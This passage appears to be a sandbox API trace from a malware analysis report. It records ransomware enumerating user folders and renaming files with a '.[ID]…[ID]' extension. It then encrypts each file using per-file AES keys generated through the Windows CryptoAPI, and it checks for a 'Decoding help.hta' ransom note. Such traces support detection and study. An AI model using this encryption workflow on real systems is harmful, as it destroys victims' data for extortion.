lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0043.823] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0043.823] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="I1fpTZ.m4a" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a" [0043.823] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a" [0043.823] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a.[ID]g9uZrLhJaygpwRm1[ID]" [0043.823] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i1fptz.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i1fptz.m4a.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\i1fptz.m4a.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0043.823] CreateFileMappingA (hFile=0x3c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3c4 [0043.823] CryptAcquireContextA (in: phProv=0xdbcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdbcfcec*=0x34491c0) returned 1 [0043.824] CryptGenKey (in: hProv=0x34491c0, Algid=0x6610, dwFlags=0x1, phKey=0xdbcfce8 | out: phKey=0xdbcfce8*=0x5a59f0) returned 1 [0043.824] CryptExportKey (in: hKey=0x5a59f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdbcfbe4, pdwDataLen=0xdbcfce4 | out: pbData=0xdbcfbe4*, pdwDataLen=0xdbcfce4*=0x2c) returned 1 [0043.824] MapViewOfFile (hFileMappingObject=0x3c4, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x106a0) returned 0x49e0000 [0043.826] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdbcfbe4*, pdwDataLen=0xdbcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdbcfbe4*, pdwDataLen=0xdbcfcf8*=0x100) returned 1 [0043.826] CryptEncrypt (in: hKey=0x5a59f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x49e0000, pdwDataLen=0xdbcfce4*=0x106a0, dwBufLen=0x106a0 | out: pbData=0x49e0000*, pdwDataLen=0xdbcfce4*=0x106a0) returned 1 [0045.635] UnmapViewOfFile (lpBaseAddress=0x49e0000) returned 1 [0045.867] CloseHandle (hObject=0x3c4) returned 1 [0045.867] CryptDestroyKey (hKey=0x5a59f0) returned 1 [0045.867] CryptReleaseContext (hProv=0x34491c0, dwFlags=0x0) returned 1 [0045.867] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0045.867] WriteFile (in: hFile=0x3c0, lpBuffer=0xdbcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xdbcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xdbcfbe4*, lpNumberOfBytesWritten=0xdbcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0045.868] WriteFile (in: hFile=0x3c0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xdbcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xdbcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0045.868] CloseHandle (hObject=0x3c0) returned 1 [0045.870] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\I1fpTZ.m4a.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0045.870] FindNextFileW (in: hFindFile=0x5a5af0, lpFindFileData=0xdbcfd30 | out: lpFindFileData=0xdbcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c5022e0, ftCreationTime.dwHighDateTime=0x1d4c91e, ftLastAccessTime.dwLowDateTime=0x46412270, ftLastAccessTime.dwHighDateTime=0x1d4d111, ftLastWriteTime.dwLowDateTime=0x46412270, ftLastWriteTime.dwHighDateTime=0x1d4d111, nFileSizeHigh=0x0, nFileSizeLow=0xf4e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="IPfTaSJ_lTaSr.wav", cAlternateFileName="IPFTAS~1.WAV")) returned 1 [0048.971] lstrcpyW (in: lpString1=0x5e90c18, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0048.971] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0048.971] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" [0048.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\decoding help.hta")) returned 0x1 [0048.972] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IPfTaSJ_lTaSr.wav") returned -1 [0048.972] lstrlenW (lpString="IPfTaSJ_lTaSr.wav") returned 17 [0048.972] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0048.972] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0048.972] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="IPfTaSJ_lTaSr.wav" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav" [0048.972] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav" [0048.972] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav.[ID]g9uZrLhJaygpwRm1[ID]" [0048.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ipftasj_ltasr.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ipftasj_ltasr.wav.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0052.971] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ipftasj_ltasr.wav.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6bc [0052.972] CreateFileMappingA (hFile=0x6bc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x718 [0052.972] CryptAcquireContextA (in: phProv=0xdbcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdbcfcec*=0x3449e80) returned 1 [0054.972] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0xdbcfce8 | out: phKey=0xdbcfce8*=0x5d8610) returned 1 [0054.972] CryptExportKey (in: hKey=0x5d8610, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdbcfbe4, pdwDataLen=0xdbcfce4 | out: pbData=0xdbcfbe4*, pdwDataLen=0xdbcfce4*=0x2c) returned 1 [0054.972] MapViewOfFile (hFileMappingObject=0x718, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf4e0) returned 0x2d0000 [0054.974] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdbcfbe4*, pdwDataLen=0xdbcfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdbcfbe4*, pdwDataLen=0xdbcfcf8*=0x100) returned 1 [0054.974] CryptEncrypt (in: hKey=0x5d8610, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0xdbcfce4*=0xf4e0, dwBufLen=0xf4e0 | out: pbData=0x2d0000*, pdwDataLen=0xdbcfce4*=0xf4e0) returned 1 [0054.975] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0054.977] CloseHandle (hObject=0x718) returned 1 [0054.977] CryptDestroyKey (hKey=0x5d8610) returned 1 [0054.977] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0054.977] SetFilePointerEx (in: hFile=0x6bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.977] WriteFile (in: hFile=0x6bc, lpBuffer=0xdbcfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xdbcfcf8, lpOverlapped=0x0 | out: lpBuffer=0xdbcfbe4*, lpNumberOfBytesWritten=0xdbcfcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.950] WriteFile (in: hFile=0x6bc, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xdbcfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xdbcfcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.950] CloseHandle (hObject=0x6bc) returned 1 [0056.951] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\IPfTaSJ_lTaSr.wav.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.509] FindNextFileW (in: hFindFile=0x5a5af0, lpFindFileData=0xdbcfd30 | out: lpFindFileData=0xdbcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd576fbc0, ftCreationTime.dwHighDateTime=0x1d4c948, ftLastAccessTime.dwLowDateTime=0x27113930, ftLastAccessTime.dwHighDateTime=0x1d4cd8d, ftLastWriteTime.dwLowDateTime=0x27113930, ftLastWriteTime.dwHighDateTime=0x1d4cd8d, nFileSizeHigh=0x0, nFileSizeLow=0xc238, dwReserved0=0x0, dwReserved1=0x0, cFileName="mfyjN9Twq.mp3", cAlternateFileName="MFYJN9~1.MP3")) returned 1 [0058.509] lstrcpyW (in: lpString1=0x2a6a0048, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0058.509] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0058.509] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" [0058.510] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\decoding help.hta")) returned 0x1 [0058.510] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mfyjN9Twq.mp3") returned -1 [0058.510] lstrlenW (lpString="mfyjN9Twq.mp3") returned 13 [0058.510] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*" [0058.510] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*.*") returned 43 [0058.510] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\", lpString2="mfyjN9Twq.mp3" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mfyjN9Twq.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mfyjN9Twq.mp3" [0058.510] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mfyjN9Twq.mp3" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mfyjN9Twq.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mfyjN9Twq.mp3" [0058.510] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mfyjN9Twq.mp3", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mfyjN9Twq.mp3.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mfyjN9Twq.mp3.[ID]g9uZrLhJaygpwRm1[ID]" [0058.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mfyjN9Twq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mfyjn9twq.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mfyjN9Twq.mp3.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mfyjn9twq.mp3.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\mfyjN9Twq.mp3.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mfyjn9twq.mp3.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6bc [0058.511] CreateFileMappingA (hFile=0x6bc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc90 [0058.511] CryptAcquireContextA (in: phProv=0xdbcfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdbcfcec*=0x2aac6c38) returned 1 [0060.228] CryptGenKey (in: hProv=0x2aac6c38, Algid=0x6610, dwFlags=0x1, phKey=0xdbcfce8 | out: phKey=0xdbcfce8*=0x10f14440) returned 1 [0060.228] CryptExportKey (in: hKey=0x10f14440, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdbcfbe4, pdwDataLen=0xdbcfce4 | out: pbData=0xdbcfbe4*, pdwDataLen=0xdbcfce4*=0x2c) returned 1 [0060.228] MapViewOfFile (hFileMappingObject=0xc90, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc220) returned 0x49d0000 Thread: id = 177 os_tid = 0x324 [0040.347] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*.*", lpFindFileData=0xdd0fd30 | out: lpFindFileData=0xdd0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5b30 [0040.347] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.347] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdd0fd30 | out: lpFindFileData=0xdd0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.347] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.347] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.347] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdd0fd30 | out: lpFindFileData=0xdd0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 1 [0040.347] lstrcmpW (lpString1=".", lpString2="Client") returned -1 [0040.347] lstrcmpW (lpString1="..", lpString2="Client") returned -1 [0040.347] lstrcmpiW (lpString1="windows", lpString2="Client") returned 1 [0040.350] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*.*" [0040.350] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\*.*") returned 43 [0040.350] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\", lpString2="Client" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client" [0040.350] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*.*" [0040.350] GlobalMemoryStatus (in: lpBuffer=0xdd0fd10 | out: lpBuffer=0xdd0fd10) [0040.350] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e46f60, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x27c [0040.351] CloseHandle (hObject=0x27c) returned 1 [0040.351] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdd0fd30 | out: lpFindFileData=0xdd0fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Client", cAlternateFileName="")) returned 0 [0040.351] FindClose (in: hFindFile=0x5a5b30 | out: hFindFile=0x5a5b30) returned 1 Thread: id = 178 os_tid = 0x884 [0040.352] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Application Data\\*.*", lpFindFileData=0xde4fd30 | out: lpFindFileData=0xde4fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 179 os_tid = 0x7ac [0040.353] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*", lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x20bb00f0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x20bb00f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5b30 [0040.353] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.353] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x20bb00f0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x20bb00f0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.353] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.353] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.353] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x20b3dcd0, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x20b3dcd0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x20b3dcd0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0040.354] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0040.354] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0040.354] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0040.354] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0040.354] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0040.354] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x896b9210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x896b9210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x20b3dcd0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x786, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hx.hxn.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="HXHXN~1._ID")) returned 1 [0040.354] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0040.354] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0040.354] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0040.354] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0040.354] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Hx.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned -1 [0040.354] lstrlenW (lpString="Hx.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned 31 [0040.354] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0040.354] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: 